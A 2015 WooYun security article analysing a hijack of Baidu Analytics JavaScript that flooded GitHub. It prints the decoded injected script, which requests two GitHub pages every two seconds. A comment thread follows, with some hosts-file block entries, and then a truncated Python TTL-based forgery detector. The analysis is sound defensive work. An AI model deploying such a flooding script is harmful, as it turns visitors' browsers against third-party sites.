<main class="main-container ng-scope" ng-view=""><div class="main receptacle post-view ng-scope"><article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox=""><header><h1 class="entry-title ng-binding">Baidu Analytics JS Hijacked to DDoS GitHub</h1><div class="entry-meta"><a target="_blank" class="author name ng-binding">insight-labs</a> <span class="bull">·</span> <time title="2015/03/27 14:07" ui-time="" datetime="2015/03/27 14:07" class="published ng-binding ng-isolate-scope">2015/03/27 14:07</time></div></header><section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml"><p></p><h2>0x00 Background</h2><hr><p>Around noon today, while I was browsing zone.wooyun.org, the country's largest same-sex dating community for information security professionals, my browser suddenly started popping up an alert every 2 seconds:</p><pre><code>malicious javascript detected on this domain
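</code></pre><p><img alt="enter image description here" img-src="b574faa3173f58b7bc9d5beb03f6ccf37c68f060.jpg"></p><p>My first reaction was that some mischievous buddy had XSSed zone again, so I immediately opened the developer tools to investigate.</p><h2>0x01 Details</h2><hr><p>I immediately found that the JS producing the alert was actually being loaded from GitHub:</p><p><img alt="enter image description here" img-src="74e15e0b19b6f40eb95a3876f7e6d28d0fb2eb87.jpg"></p><p>But why would WooYun load JS from GitHub, and from the greatfire and New York Times mirrors at that?</p><p>My first guess was that the page had an XSS or that a JS file had been hijacked. After a long search I finally found it, and it turned out to be:</p><pre><code>hm.baidu.com/h.js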
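</code></pre><p>WooYun does indeed load this JS; it is the Baidu Analytics JS code. Opening it shows a lightly encrypted JS that evals an encoded string. I ran it through a random online decoder and found the following:</p><pre><code>#!js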
document.write("&lt;script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'&gt;\x3c/script&gt;");
!window.jQuery &amp;&amp; document.write("&lt;script src='http://code.jquery.com/jquery-latest.js'&gt;\x3c/script&gt;");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}

function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 &gt; responseTime - startime &amp;&amp; (r_send(b), count += 1)
        }
    })
}

function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);
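</code></pre><p>Roughly speaking, it turns off caching and then, every 2 seconds, loads one of</p><pre><code>url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
</code></pre><p>the two URLs in this array.</p><p>I asked friends inside the Great Firewall, and the JS they see is normal. But a request from an IP outside the firewall to</p><pre><code>http://hm.baidu.com/h.js
</code></pre><p>returns the JS file above, which requests these two URLs every 2 seconds.</p><p>A look at Twitter suggests that GitHub has been under DDoS attack since March 18. greatfire later replaced the content of the attacked pages with</p><pre><code>#!js
alert("WARNING: malicious javascript detected on this domain")
</code></pre><p>so that the alert dialog stops the JS loop from running.</p><p><img alt="enter image description here" img-src="358f02154d284f92dfec3593fa6b898f17195fa7.jpg"></p><p>Figure 3: traceroute from a foreign IP to hm.baidu.com</p><p>DNS does not appear to have been hijacked. It looks like, as before, the IP itself was hijacked or the file was replaced directly at the HTTP layer.</p><p><img alt="enter image description here" img-src="e46036a9cc01ece360fda26095cd4c9d2ab57e3d.jpg"></p><p>A port scan showed only 80 and 443 open. Over HTTPS the response is a normal empty page (the JS file only appears when a Referer is sent).</p><p><img alt="enter image description here" img-src="ffd500f879953a80b247e7ea304bb3c1ce8918ea.jpg"></p><p>By the time the author went to capture packets, the hijacking had already stopped. Someone on <a href="https://twitter.com/mac_zhou/status/581324446058713088">twitter</a> had already analyzed it, quoted below:</p><blockquote><p>Packet capture trace: the TTL the real Baidu server returns to my Japanese VPS is 51, while the TTL of the packet carrying the HTTP 200 OK response is 47. What is certain is that an intermediate device sent forged packets to the VPS.</p></blockquote><p><img alt="enter image description here" img-src="4193acfe89378cc646cbb617efeba7e008627491.jpg"></p><p>Truly shameless, heh.</p><p>It suddenly reminds me of something a webmaster said back when DNS was being hijacked to point at foreign servers:</p><pre><code>They have weaponized their entire population.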
</code></pre><p>Now it should be:</p><pre><code>They have weaponized their entire population of the Earth.
</code></pre><p></p></section></article><div class="entry-controls clearfix"><div style="float:left;color:#9d9e9f;font-size:15px"><span>&copy;WooYun Knowledge Base. All rights reserved. Reproduction without permission is prohibited.</span></div></div><div id="comments" class="comment-list clearfix"><div id="comment-list"><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">威霸总代理</span> <span class="reply-time">2016-06-22 19:00:09</span></div><p></p><p>Bump! www.viper-china.net</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">haitaowuyun</span> <span class="reply-time">2015-04-08 14:17:08</span></div><p></p><p>This cracks me up: &quot;good kill&quot;, &quot;great-power rivalry&quot;<br>Great power, heh</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">呵呵</span> <span class="reply-time">2015-04-05 23:03:36</span></div><p></p><p>If you don't care about politics, politics will come and care about you<br>Heh, you won't talk like this once politics has taken an interest in you<br>naive</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Dr. 
What</span> <span class="reply-time">2015-04-05 11:52:17</span></div><p></p><p>Fair point. So by that logic... everyone in mainland China is a Snowden? Because everybody already knows all the dirty business. An incident like PRISM would probably have no impact at all even if it happened in China, because everyone would just think, “Oh, I'm being monitored? Isn't that perfectly normal? It has always been this way and everyone knows it.”</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">随便吧</span> <span class="reply-time">2015-04-05 06:33:44</span></div><p></p><p>Politics has always been dirty, and great-power rivalry is darker still. The poster above is laughably naive.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">随便吧</span> <span class="reply-time">2015-04-05 06:32:20</span></div><p></p><p>If you have been let in on the dirty business, then you are on a par with Snowden.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">呵呵</span> <span class="reply-time">2015-04-05 05:37:42</span></div><p></p><p>Heh, “good kill”? How are you any different from ISIS? Bandit dog</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">insight-labs</span> <span class="reply-time">2015-04-04 19:40:49</span></div><p></p><p>At least I have never heard of GitHub, Google or Microsoft hijacking their traffic to DDoS someone else...</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">insight-labs</span> <span class="reply-time">2015-04-04 
19:40:14</span></div><p></p><p>The evidence is here:<br>http://www.netresec.com/?page=Blog&amp;month=2015-03&amp;post=China%27s-Man-on-the-Side-Attack-on-GitHub</p><p>http://blog.erratasec.com/2015/04/pin-pointing-chinas-attack-against.html</p><p>Probing with packet TTLs incremented from 1, the forged response packets appear once the path passes through a China Netcom backbone router.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">探狗</span> <span class="reply-time">2015-04-04 16:35:25</span></div><p></p><p>GitHub, Google and Microsoft shouldn't act all high and mighty either; they had their part in PRISM too. If it all really came out, nobody's hands are clean.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">尼玛</span> <span class="reply-time">2015-04-04 15:33:46</span></div><p></p><p>I honestly read through the posts above, and the evidence really is insufficient. Can anyone provide convincing evidence?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">sisige</span> <span class="reply-time">2015-04-04 12:50:41</span></div><p></p><p>Looking at it now, good kill</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">sigh</span> <span class="reply-time">2015-04-04 10:17:19</span></div><p></p><p>If I stop all JavaScript from baidu.com from running in Chrome, would that solve this problem? I want to look at some things on Baidu but don't want to be used as a tool for attacking it.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">坑爹工人</span> <span class="reply-time">2015-04-04 07:11:56</span></div><p></p><p>md. 
From now on, I will only use Tor to view Chinese websites</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">坑爹工人</span> <span class="reply-time">2015-04-04 07:07:33</span></div><p></p><p>A temporary workaround is to add the following to drivers/etc/.hosts</p><p>#GFW DDoS<br>127.0.0.1 hm.baidu.com<br>127.0.0.1 pos.baidu.com<br>127.0.0.1 cbjs.baidu.com<br>127.0.0.1 dup.baidustatic.com<br>127.0.0.1 eclick.baidu.com<br>127.0.0.1 cpro.baidu.com</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">求问</span> <span class="reply-time">2015-04-04 05:32:56</span></div><p></p><p>May I ask how you tracked it down to this JS?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">kleenex</span> <span class="reply-time">2015-04-04 03:05:32</span></div><p></p><p>Chrome has an extension for disabling JS, Quick Javascript Switcher<br>But once you use it, most web pages become basically unusable QAQ</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">T0ne5</span> <span class="reply-time">2015-04-02 11:43:01</span></div><p></p><p>Please come with me to the relevant authorities.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">麻痹GFW</span> <span class="reply-time">2015-04-02 04:06:07</span></div><p></p><p>Doesn't work...</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div 
class="comment-header"><span class="author-link">Rykiex</span> <span class="reply-time">2015-04-01 12:10:52</span></div><p></p><p>What a pain~ So many sites have been like this over the past few days. I can't browse normally at all, and I can't disable JS either~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">an9</span> <span class="reply-time">2015-03-31 18:58:58</span></div><p></p><p>Just here to take a look.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">wefgod</span> <span class="reply-time">2015-03-31 09:57:27</span></div><p></p><p>The TTL changed, which means there were a few more hops than before</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">flyfish</span> <span class="reply-time">2015-03-31 04:25:53</span></div><p></p><p>We workers have power.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">呵呵</span> <span class="reply-time">2015-03-31 03:34:53</span></div><p></p><p>Heh, is there anything the CCP wouldn't do? Back in '89 that sb Deng Xiaoping could even say “kill 200,000 people to keep power for 20 years”, so what is a mere DDoS?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">黑蛋</span> <span class="reply-time">2015-03-30 23:50:41</span></div><p></p><p>Got wrecked</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">感觉在这里说话的都会被水表</span> <span 
class="reply-time">2015-03-30 21:54:48</span></div><p></p><p>GF just keeps sinking to new lows, time after time.<br>I wouldn't be surprised if they switched to a monarchy some day<br>~~Only a monarchy can better realize communism~~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">merito</span> <span class="reply-time">2015-03-30 20:08:51</span></div><p></p><p>Feels like a joke...</p><p>By the way, surprising that this post hasn't been taken down by PR</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">baidu</span> <span class="reply-time">2015-03-30 17:03:56</span></div><p></p><p>We are currently experiencing the largest DDoS (distributed denial of service) attack in github.com&#039;s history. March 28, 2015</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">牛</span> <span class="reply-time">2015-03-30 14:22:40</span></div><p></p><p>It should be possible to find that person.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">tutugreen</span> <span class="reply-time">2015-03-30 01:43:29</span></div><p></p><p>+1</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">張旭</span> <span class="reply-time">2015-03-29 21:02:30</span></div><p></p><p>This is ridiculous ....<br>The GFW really knows no limits ...</p><p>This is truly frightening.<br>What kind of government organization is this .... 
Disgusting.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">匿了吧还是</span> <span class="reply-time">2015-03-29 20:39:23</span></div><p></p><p>Isn't IP connectionless? A change in TTL doesn't prove anything.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">昵称</span> <span class="reply-time">2015-03-29 17:41:02</span></div><p></p><p>Suddenly reminded of the Sony hack</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">soloman</span> <span class="reply-time">2015-03-29 16:29:51</span></div><p></p><p>Actually, I'd really like to know what the point of doing this is. Obviously it can't be to wipe these files off the face of the earth, so what is the goal? Threatening GitHub into behaving?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">microsniper</span> <span class="reply-time">2015-03-29 15:33:28</span></div><p></p><p>What kind of tea would you like, sir?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xzwj</span> <span class="reply-time">2015-03-29 
13:54:48</span></div><p></p><p>Wikipedia</p><p>Mainland China<br>On January 20, 2013, the mainland Chinese government's Great Firewall blocked GitHub by means of DNS poisoning and keyword filtering, so that users in mainland China could not access it directly. Before that, a ticket-grabbing plugin for 12306, the ticketing website of the Ministry of Railways of the People's Republic of China, had improperly referenced a JS file hosted on GitHub (retrying in an infinite loop), which greatly slowed GitHub's servers. The plugin's author later moved the JavaScript file to another site. In response to the government's blocking of GitHub, the well-known figure Kai-Fu Lee posted a protest on Sina Weibo that quickly drew the attention of netizens and was reposted more than 32,000 times within three hours. On January 23, 2013, GitHub was unblocked and the incident subsided.</p><p>On January 26, 2013, users in mainland China found the certificate invalid when visiting GitHub. Inspection showed that GitHub's certificate had been replaced by a self-signed X.509 certificate, generated at 14:29:12 on January 25, 2013 and valid for one year, so some speculated that GitHub had been subjected to a man-in-the-middle attack. The attack stopped after about an hour and access returned to normal.</p><p>DDoS attack<br>GitHub stated on its official Twitter account that, starting on March 26, 2015, it had been under a sustained DDoS attack for more than 24 hours. GitHub called it the most severe DDoS attack in GitHub's history. Third-party researchers pointed out that the attack used HTTP hijacking: a man in the middle planted code attacking GitHub in Baidu Analytics' script file, and its function was to load a certain GitHub page every 2 seconds. Baidu has denied that its own products have security problems. The attack slowed access to GitHub worldwide. From March 28, GitHub was very unstable in mainland China and inaccessible most of the time.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">小樱</span> <span class="reply-time">2015-03-29 01:23:37</span></div><p></p><p>Just passing by to watch... what the heck</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">depycode</span> <span class="reply-time">2015-03-28 22:31:24</span></div><p></p><p>Hacker</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">sin</span> <span class="reply-time">2015-03-28 21:11:47</span></div><p></p><p>Damn,,,, it had me switching back and forth between Firefox and Chrome. I even rebooted a few times</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">f4ckbaidu</span> <span class="reply-time">2015-03-28 18:39:02</span></div><p></p><p>Killing off all Baidu domains with comodo website filtering + going over the wall, no trouble at all here</p><p></p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">vvtommy</span> <span class="reply-time">2015-03-28 15:46:44</span></div><p></p><p>So this really is hijacking...</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">hehehehehe</span> <span class="reply-time">2015-03-28 14:41:37</span></div><p></p><p>The alert should be replaced with<br>window.location.href = &quot;https://github.com/greatfire/&quot;;<br>so that everyone gets to see it.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">不填说不了话</span> <span class="reply-time">2015-03-28 13:28:28</span></div><p></p><p>Um, Baidu, hurry and get PR to delete this post</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">tutugreen</span> <span class="reply-time">2015-03-28 10:50:36</span></div><p></p><p>Uh, so that's why the gf page said it was being DDoSed.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">红帽子</span> <span class="reply-time">2015-03-28 10:34:29</span></div><p></p><p>We workers have power!</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">github</span> <span class="reply-time">2015-03-28 09:54:06</span></div><p></p><p>We are currently experiencing the 
largest DDoS (distributed denial of service) attack in github.com&#039;s history. March 28, 2015</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">504ConnectionReset</span> <span class="reply-time">2015-03-28 01:40:08</span></div><p></p><p>Search &quot;.baidu.com&quot; (54 hits in 1 file)<br>C:\Windows\System32\drivers\etc\hosts (54 hits)</p><p></p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">暗羽</span> <span class="reply-time">2015-03-27 21:51:04</span></div><p></p><p>We workers have power!</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">爱上平顶山</span> <span class="reply-time">2015-03-27 21:08:06</span></div><p></p><p>Nice</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">水泥中的鱼</span> <span class="reply-time">2015-03-27 20:41:02</span></div><p></p><p>My first reaction at the time</p><p>127.0.0.1 hm.baidu.com</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Winck</span> <span class="reply-time">2015-03-27 20:25:11</span></div><p></p><p>Visiting the country's largest same-sex dating community for information security professionals ended up launching an attack on the world's largest same-sex dating community for programmers. Why is that.. The OP takes you Approaching Science</p><p></p></div></div><div 
class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">KHG</span> <span class="reply-time">2015-03-27 19:54:53</span></div><p></p><p>They did not attack their main sites; instead they DDoSed the cloud service they use. This kind of network threat that tries to hijack normal traffic, shall we give it a name?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">leakless</span> <span class="reply-time">2015-03-27 19:12:01</span></div><p></p><p>We workers have power~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">浅蓝</span> <span class="reply-time">2015-03-27 18:35:28</span></div><p></p><p>We workers have power</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Knight</span> <span class="reply-time">2015-03-27 17:48:15</span></div><p></p><p>Damn!</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">est</span> <span class="reply-time">2015-03-27 17:32:57</span></div><p></p><p>hahahahahahahaha</p><p>Which department's vocational-school grad pulled this off this time?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">leetom</span> <span class="reply-time">2015-03-27 16:03:23</span></div><p></p><p>I even posted a question on stackexchange specifically about this.<br>Why pull tricks like this? What grudge, what feud?</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" 
src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">dangge</span> <span class="reply-time">2015-03-27 15:39:25</span></div><p></p><p>All the sites I like to visit are same-sex dating communities...<br>Tearing up...</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">加肥了的猫</span> <span class="reply-time">2015-03-27 15:39:05</span></div><p></p><p>May our great Kung Fu Net reign for a thousand generations and unite the realm!</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2015-03-27 15:21:29</span></div><p></p><p>It popped up at 13:20 too.. The OP was really quick</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">YAOSHUO</span> <span class="reply-time">2015-03-27 15:19:50</span></div><p></p><p>Kung Fu Net and Baidu both belong to a certain department..</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">同性交友社区</span> <span class="reply-time">2015-03-27 15:07:45</span></div><p></p><p>They have weaponized their entire population.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xi4ohz</span> <span class="reply-time">2015-03-27 15:02:29</span></div><p></p><p>We workers have power!</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div 
class="content"><div class="comment-header"><span class="author-link">ooxxcc</span> <span class="reply-time">2015-03-27 14:46:01</span></div><p></p><p>Visiting the country's largest same-sex dating community for information security professionals ended up launching an attack on the world's largest same-sex dating community for programmers. Why is that.. The OP takes you Approaching Science</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xyang</span> <span class="reply-time">2015-03-27 14:34:28</span></div><p></p><p>We workers have power</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Gnest</span> <span class="reply-time">2015-03-27 14:26:44</span></div><p></p><p>We workers have power!</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">gainover</span> <span class="reply-time">2015-03-27 14:19:56</span></div><p></p><p>We workers have power!</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2015-03-27 14:15:53</span></div><p></p><p>The country's largest same-sex dating community for information security professionals says it caught a stray bullet</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xiaoL</span> <span class="reply-time">2015-03-27 14:15:25</span></div><p></p><p>So cool! Haha!</p><p></p></div></div></div></div></div></main>
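<p>The TTL comparison quoted in the article (51 from the real Baidu server, 47 on the HTTP 200 OK) can be applied to every flow in a capture. The following is an added example, not code from the original post or from any tool it mentions: the packet records, flow names, field names and the tolerance parameter are constructed assumptions, and the second check (two different payloads at the same sequence number) goes beyond what the post describes.</p>

```python
from collections import Counter, defaultdict, namedtuple

# One server-to-client packet as exported from a capture (field names are assumptions).
Packet = namedtuple("Packet", "flow flags seq ttl payload")

# Constructed sample data. TTL 51 (real server) and 47 (forged reply) are the
# values quoted in the article; everything else is made up for this example.
PACKETS = [
    # Flow A: handshake from the real server, then a forged HTTP 200 that wins
    # the race, then the genuine reply arriving for the same sequence number.
    Packet("A", "SA", 5000, 51, b""),
    Packet("A", "PA", 5001, 47, b"HTTP/1.1 200 OK\r\n\r\neval(function(p,a,c,k,e,r){})"),
    Packet("A", "PA", 5001, 51, b"HTTP/1.1 200 OK\r\n\r\n(function(){var h={};})()"),
    # Flow B: untouched; one packet took a route that was one hop longer.
    Packet("B", "SA", 9000, 51, b""),
    Packet("B", "PA", 9001, 51, b"HTTP/1.1 200 OK\r\n\r\n(function(){var h={};})()"),
    Packet("B", "A", 9045, 50, b""),
    # Flow C: capture started mid-stream (no SYN-ACK) and the genuine reply
    # was never seen, so only the TTL signal is available.
    Packet("C", "A", 7000, 51, b""),
    Packet("C", "A", 7000, 51, b""),
    Packet("C", "PA", 7000, 47, b"HTTP/1.1 200 OK\r\n\r\neval(function(p,a,c,k,e,r){})"),
]


def baseline_ttl(packets):
    """TTL assumed to belong to the real server.

    Assumption: the SYN-ACK comes from the real server, as in the quoted
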